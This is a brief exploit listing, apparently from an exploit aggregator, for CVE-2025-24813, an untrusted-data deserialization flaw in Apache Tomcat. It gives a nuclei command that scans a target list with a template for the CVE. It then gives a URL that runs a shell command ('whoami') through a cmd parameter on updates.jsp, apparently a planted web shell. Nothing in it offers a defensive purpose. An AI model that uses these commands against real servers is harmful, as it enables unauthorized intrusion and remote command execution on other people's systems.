Exploit for Deserialization of Untrusted Data in Apache Tomcat
Exploit Code
## https://sploitus.com/exploit?id=7D32301A-8BC9-5488-A878-2EE0E9140232
# CVE-2025-24813
Nuclei Template CVE-2025β24813
```
nuclei -l list.txt -t CVE-2025β24813.yaml
````
# execute shell
```
http://target.com/updates.jsp?cmd=whoami
```